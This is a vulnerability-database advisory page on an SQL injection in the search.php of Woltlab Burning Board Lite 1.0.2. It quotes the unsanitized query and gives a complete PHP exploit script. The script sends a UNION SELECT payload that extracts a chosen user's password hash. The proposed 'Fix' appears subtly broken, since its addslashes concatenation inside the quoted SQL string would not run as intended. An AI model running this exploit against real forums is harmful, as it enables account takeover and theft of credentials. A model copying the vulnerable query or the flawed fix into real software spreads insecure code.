Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18704
HistoryDec 21, 2007 - 12:00 a.m.

Woltlab Burning Board 1.0.2 SQL-Injection Vulnerability

2007-12-2100:00:00
vulners.com
20
JSON

In Woltlab Burning Board Lite(1.0.2) is a SQL-Injection Vulnerability in file:
search.php :
Line: 510-515

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE
postids='$savepostids' AND showposts='$_POST[showposts]' AND
sortby='$_POST[sortby]' AND sortorder='$_POST[sortorder]' AND
userid='$wbbuserdata[userid]' AND ipaddress='$REMOTE_ADDR'");
if($result['searchid']) {
header("Location:
search.php?searchid=$result[searchid]&sid=$session[hash]");
exit();
}

There no addslashes() in $_POST[showposts], $_POST[sortby].
$_POST[sortorder].

== Exploit ==
<?php
$host = $argv[1];
$path = $argv[2];
$searchstring = $argv[3];
$userid = $argv[4];
If ($argc <= 4)
{
echo "Usage: filename.php [host] [path] [searchstring] [user-id] \n Examples:
\n php filename.php localhost /wbblite/search.php Computer 1\n php
filename.php localhost /search.php Board 1\n";
die;
}
$sqlinjecting
= "searchstring=$searchstring&searchuser=&name_exactly=1&boardids%5B%5D=&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=%27%20UNION%20SELECT%20password%20FROM%20bb1_users%20WHERE%20userid=$userid%20/&send=send&sid=&submit=Suchen";
$con = fsockopen($host, 80);
echo("==Woltlab Burning Board LITE SQL-Injection Exploit founded and coded
by NBBN. \n\n\n");
sleep(1);
fputs($con, "POST $path HTTP/1.1\n");
fputs($con, "Host: $host\n");
fputs($con, "Content-type: application/x-www-form-urlencoded\n");
fputs($con, "Content-length: ". strlen($sqlinjecting) ."\n");
fputs($con, "Connection: close\n\n");
fputs($con, "$sqlinjecting\n");

while(!feof($con)) {
$res .= fgets($con, 128);
}
echo("Well done…\n");
fclose($con);

echo $res;
echo "The password-hash is in search.php?searchid=[Hash]\n";
$the_hash = substr($res,strpos($res,'searchid=')+9,32);
echo "Hash: $the_hash\n\n";
?>

== Fix ==

if(!$savepostids) eval("error(\"".$tpl->get("error_searchnoresult")."\");");
$result=$db->query_first("SELECT searchid FROM bb".$n."_searchs WHERE
postids='$savepostids' AND showposts='.addslashes($_POST[showposts]).' AND
sortby='.addslashes($_POST[sortby]).' AND
sortorder='.addslashes($_POST[sortorder]).' AND userid='$wbbuserdata[userid]'
AND ipaddress='$REMOTE_ADDR'");
if($result['searchid']) {
header("Location:
search.php?searchid=$result[searchid]&sid=$session[hash]");
exit();
}

JSON